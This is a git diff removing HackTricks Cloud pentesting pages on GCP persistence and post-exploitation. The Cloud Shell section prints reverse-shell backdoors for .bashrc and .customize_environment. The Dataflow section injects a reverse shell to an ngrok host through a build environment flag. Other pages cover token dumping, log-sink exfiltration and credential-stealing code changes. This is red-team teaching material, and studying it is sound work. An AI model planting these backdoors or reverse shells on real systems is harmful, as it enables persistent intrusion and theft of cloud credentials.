-{% endhint %} - -## Cloud Shell - -For more information check: - -{% content-ref url="../gcp-services/gcp-cloud-shell-enum.md" %} -[gcp-cloud-shell-enum.md](../gcp-services/gcp-cloud-shell-enum.md) -{% endcontent-ref %} - -### Persistent Backdoor - -[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. - -You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. - -This console has some interesting capabilities for attackers: - -1. **Any Google user with access to Google Cloud** has access to a fully authenticated Cloud Shell instance (Service Accounts can, even being Owners of the org). -2. Said instance will **maintain its home directory for at least 120 days** if no activity happens. -3. There is **no capabilities for an organisation to monitor** the activity of that instance. - -This basically means that an attacker may put a backdoor in the home directory of the user and as long as the user connects to the GC Shell every 120days at least, the backdoor will survive and the attacker will get a shell every time it's run just by doing: - -{% code overflow="wrap" %} -```bash -echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc -``` -{% endcode %} - -There is another file in the home folder called **`.customize_environment`** that, if exists, is going to be **executed everytime** the user access the **cloud shell** (like in the previous technique). 
Just insert the previous backdoor or one like the following to maintain persistence as long as the user uses "frequently" the cloud shell: - -```bash -#!/bin/sh -apt-get install netcat -y -nc 443 -e /bin/bash -``` - -{% hint style="warning" %} -It is important to note that the **first time an action requiring authentication is performed**, a pop-up authorization window appears in the user's browser. This window must be accepted before the command can run. If an unexpected pop-up appears, it could raise suspicion and potentially compromise the persistence method being used. -{% endhint %} - -This is the pop-up from executing `gcloud projects list` from the cloud shell (as attacker) viewed in the browsers user session: - -
- -However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**: - -```bash -gcloud auth print-access-token -gcloud auth application-default print-access-token -``` - -#### How the SSH connection is stablished - -Basically, these 3 API calls are used: - -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally) -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance) -* [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell) - -But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) - -## References - -* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec) -* [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key) -* 
[https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md deleted file mode 100644 index 1cfe2f833..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Cloud SQL Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud SQL - -For more information about Cloud SQL check: - -{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} -[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md) -{% endcontent-ref %} - -### Expose the database and whitelist your IP address - -A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\ -For more information check the technique in: - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -### Create a new user / Update users password / Get password of a user - -To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\ -Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\ -Remember that **it's possible to list the users of a database** using GCP API. - -{% hint style="info" %} -You can create/update users using GCP API or from inside the databae if you have enough permissions. -{% endhint %} - -For more information check the technique in: - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md deleted file mode 100644 index 06a63c4e9..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md +++ /dev/null @@ -1,45 +0,0 @@ -# GCP - Compute Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Compute - -For more informatoin about Compute and VPC (Networking) check: - -{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %} -[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/) -{% endcontent-ref %} - -### Persistence abusing Instances & backups - -* Backdoor existing VMs -* Backdoor disk images and snapshots creating new versions -* Create new accessible instance with a privileged SA - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md deleted file mode 100644 index 13153856c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md +++ /dev/null @@ -1,79 +0,0 @@ -# GCP - Dataflow Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Dataflow - -### Invisible persistence in built container - -Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template: - -```bash -git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git -cd python-docs-samples/dataflow/flex-templates/getting_started - -# Create repository where dockerfiles and code is going to be stored -export REPOSITORY=flex-example-python -gcloud storage buckets create gs://$REPOSITORY - -# Create artifact storage -export NAME_ARTIFACT=flex-example-python -gcloud artifacts repositories create $NAME_ARTIFACT \ - --repository-format=docker \ - --location=us-central1 -gcloud auth configure-docker us-central1-docker.pkg.dev - -# Create template -export NAME_TEMPLATE=flex-template -gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \ - --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \ - --sdk-language "PYTHON" \ - --flex-template-base-image "PYTHON3" \ - --metadata-file "metadata.json" \ - --py-path "." \ - --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \ - --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \ - --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \ - --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \ - --region=us-central1 -``` - -**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it. 
- -Then, next time the job is executed, the compromised container built will be run: - -```bash -# Run template -gcloud dataflow $NAME_TEMPLATE run testing \ - --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \ - --parameters=output="gs://$REPOSITORY/out" \ - --region=us-central1 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md deleted file mode 100644 index 9710f452c..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Filestore Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Filestore - -For more information about Filestore check: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Give broader access and privileges over a mount - -An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page: - -{% content-ref url="gcp-filestore-persistence.md" %} -[gcp-filestore-persistence.md](gcp-filestore-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md deleted file mode 100644 index 05deeb7fa..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Logging Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Logging - -Find more information about Logging in: - -{% content-ref url="../gcp-services/gcp-logging-enum.md" %} -[gcp-logging-enum.md](../gcp-services/gcp-logging-enum.md) -{% endcontent-ref %} - -### `logging.sinks.create` - -Create a sink to exfiltrate the logs to an attackers accessible destination: - -{% code overflow="wrap" %} -```bash -gcloud logging sinks create --log-filter="FILTER_CONDITION" -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md deleted file mode 100644 index 09a46acea..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - Secret Manager Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secret Manager - -Find more information about Secret Manager in: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### Rotation misuse - -An attacker could update the secret to: - -* **Stop rotations** so the secret won't be modified -* **Make rotations much less often** so the secret won't be modified -* **Publish the rotation message to a different pub/sub** -* **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md deleted file mode 100644 index ada06789d..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage - -For more information about Cloud Storage check: - -{% content-ref url="../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### `storage.hmacKeys.create` - -You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create). - -```bash -# Create key -gsutil hmac create - -# Configure gsutil to use it -gsutil config -a - -# Use it -gsutil ls gs://[BUCKET_NAME] -``` - -Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). - -### Give Public Access - -**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in: - -{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %} -[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md deleted file mode 100644 index 5c17fd3ec..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md +++ /dev/null @@ -1,70 +0,0 @@ -# GCP - App Engine Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## `App Engine` - -For information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush` - -With these permissions it's possible to: - -* Add a key -* List keys -* Get a key -* Delete - -{% hint style="danger" %} -However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**. - -If you know easier ways to use these permissions send a Pull Request! -{% endhint %} - -### `logging.views.access` - -With this permission it's possible to **see the logs of the App**: - -```bash -gcloud app logs tail -s -``` - -### Read Source Code - -The source code of all the versions and services are **stored in the bucket** with the name **`staging..appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**. - -### Modify Source Code - -Modify source code to steal credentials if they are being sent or perform a defacement web attack. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md deleted file mode 100644 index 4eb194006..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Artifact Registry Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Privesc - -The Post Exploitation and Privesc techniques of Artifact Registry were mixed in: - -{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %} -[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md deleted file mode 100644 index 7fc7b5f47..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md +++ /dev/null @@ -1,56 +0,0 @@ -# GCP - Cloud Build Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
